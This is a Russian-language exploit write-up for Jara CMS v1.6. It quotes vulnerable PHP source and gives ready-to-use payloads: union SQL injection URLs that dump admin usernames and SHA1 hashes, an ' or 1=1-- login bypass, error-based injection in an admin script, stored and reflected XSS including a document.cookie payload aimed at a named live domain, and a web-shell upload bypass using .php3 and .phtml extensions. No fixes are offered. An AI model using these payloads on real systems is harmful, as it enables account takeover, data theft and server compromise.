Jara v1.6 - 1st March 2010
http://jara.xantiz.com/download.html

category.php
@$categoryid = $_REQUEST["id"];
$category = jara_get_category($categoryid);
jara_page_start("Category: ".$category["title"]);
$query = "select * from jara_posts where categoryid = '$categoryid'";
SQL
mq=off
http://localhost/jarav16/category.php?id=-1'+union+select+1,version(),3+--+

----------------------

view.php
session_start();
$id = $_REQUEST["id"];
if(isset($_POST["name"])) {
$name = $_POST["name"];
$website = $_POST["website"];
$comment = $_POST["comment"];
if(substr($website, 0, 4) != "http") {
$website = "javascript:;";
}
$name = htmlspecialchars($name);
$comment = strip_tags($comment);
if(!get_magic_quotes_gpc()) {
$name = addslashes($name);
$website = addslashes($website);
$comment = addslashes($comment);
}
if(strlen($name) > 64) {
$name = substr($name, 0, 60) . "...";
}
if(!empty($name) && !empty($comment) && $_POST["security"] == $_SESSION["result"]) {

@jara_db_query("insert into jara_comments values('0', '$id', '$name', '$website', '$comment', '".time()."')");

$id не фильтруется, при mq=off, можно провести SQL injection + acttive XSS.
Из-за капчи удобнее использовать FireFox + Tamper Data

http://localhost/jarav16/view.php?id=1
заполняем
Your Name:
Your Comment:
Security Question:
и в Tamper Data правим id
id=1','Guest','','Hi!<script>alert(121212);</script>',1270547738) -- 1

По адресу http://localhost/jarav16/view.php?id=1 имеем alert.


----------------------

page.php
$id = $_REQUEST["id"];
$result = jara_db_query("select * from jara_pages where id = '$id' limit 1");
SQL
mq=off
http://localhost/jarav16/page.php?id=1'+union+select+1,username,unhex(hex(p assword)),4+from+jara_users+--+

Хеш хранится в формате SHA1

----------------------

В админке:
admin/upload.php
if(is_writable("./../uploads/")) {
if($_FILES["userfile"]["size"] > 0) {
$ext = strtolower(end(explode(".", basename($_FILES["userfile"]["name"]))));
if($ext == "php" || $ext == "pl" || $ext == "exe" || $ext == "sh") {
echo "<p>You're trying to upload an extension that's not allowed. Please upload it inside a container such as a compressed archive.</p>";
}
else {
if($_FILES["userfile"]["error"] == 0) {
$filename = $_SESSION["jara_admin"] . "-" . strtolower(preg_replace("/[^a-zA-Z0-9]/", "-", basename($_FILES["userfile"]["name"]))) . "-" . time() . "." . strtolower(end(explode(".", basename($_FILES["userfile"]["name"]))));
if(move_uploaded_file($_FILES["userfile"]["tmp_name"], "./../uploads/$filename")) {
echo "<p><strong>Your file was uploaded to <a href=\"../uploads/$filename\">$filename</a> in the uploads directory.</strong></p>";


Shell
загружаются файлы с расширением .php3, .phtml

----------------------

Jara v1.6 - 1st March 2010
XSS
/search.php
...try {
jara_page_start("Search results");
$term = $_REQUEST["term"];
if(!get_magic_quotes_gpc()) {
$term = addslashes($term);......
echo "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";...
...<form action="search.php" method="post">
<p>
Search term: <input type="text" name="term" id="term" /><input type="submit" value="Go" />
</p>
</form>...Результат:
в поле term - xss

SQL inj - Класика жанра!
Входим в админку Jara v1.6

/login.php
require_once("include/jara_fns.php");
if(isset($_POST["login_action"])) {
try {
session_start();
$username = $_POST["username"];
$password = $_POST["password"];
if(!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}
$result = jara_user_authenticate($_POST["username"], $_POST["password"]);
if($result == false) {
jara_page_start("Login failure");
echo "<p>\n";
echo "\tYou have entered an invalid username or password.<br />\n";
echo "\tPlease go back and try again.\n";
echo "</p>";
jara_page_end();
exit;
}
else {
header("Location: index.php");
}
}
catch(JaraDatabaseException $ex) {
jara_page_start("Login failure");...В функцию jara_user_authenticate вставляються $_POST["username"] и $_POST["password"].
Эта конструкция отдыхает:
...$username = $_POST["username"];
$password = $_POST["password"];
if(!get_magic_quotes_gpc()) {
$username = addslashes($username);
$password = addslashes($password);
}...
/include/auth_fns.php...function jara_user_authenticate($username, $password) {
$query = "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1";
$result = jara_db_query($query);
if($result->num_rows == 0) {
return false;
}
else {
$row = $result->fetch_assoc();
$_SESSION["jara_admin"] = $username;
$_SESSION["jara_permissions"] = array($row["permission_posts"], $row["permission_pages"], $row["permission_users"], $row["permission_upload"]);
return true;
}
}...Условие:
mg=off

Результат:
<input type="text" id="username" name="username" width="20" />
в поле username ' or 1=1--[ ]

SQL inj
Jara v1.6

/admin/delete_category.php
...try {
$id = $_REQUEST["id"];
if($id == 1) {
throw new JaraGeneralException("You cannot the delete the Uncategorized category.");
}
$query = "delete from jara_categories where categoryid = '$id'";
$result = jara_db_query($query);...
/include/db_fns.php
...function jara_db_connect() {
global $jconfig, $db_conn;
if($db_conn == null) {
@$conn = new mysqli($jconfig->mysql_host, $jconfig->mysql_username, $jconfig->mysql_password, $jconfig->mysql_db);
if(mysqli_connect_errno()) {
throw new JaraDatabaseException(1, mysqli_connect_errno(), mysqli_connect_error());
}
$db_conn = $conn;
return $conn;
}
else {
return $db_conn;
}
}

function jara_db_query($query) {
$conn = jara_db_connect();
$result = $conn->query($query);
if($conn->errno) {
throw new JaraDatabaseException(2, $conn->errno, $conn->error, $query);
}
if(substr($query, 0, 6) == "select" || substr($query, 0, 4) == "show" || substr($query, 0, 7) == "explain") {
return $result;
}
else {
return $conn->affected_rows;
}
}Условие:
mg=off

Результат:
http://localhost/jarav/admin/delete_category.php?id=1[sql]
http://localhost/jarav/admin/delete_category.php?id=1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--+

Также уязвимы другие скрипты!

http://xantiz.co.cc/blog/view.php?id=8%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E%3C%22 Если есть mq то можно и так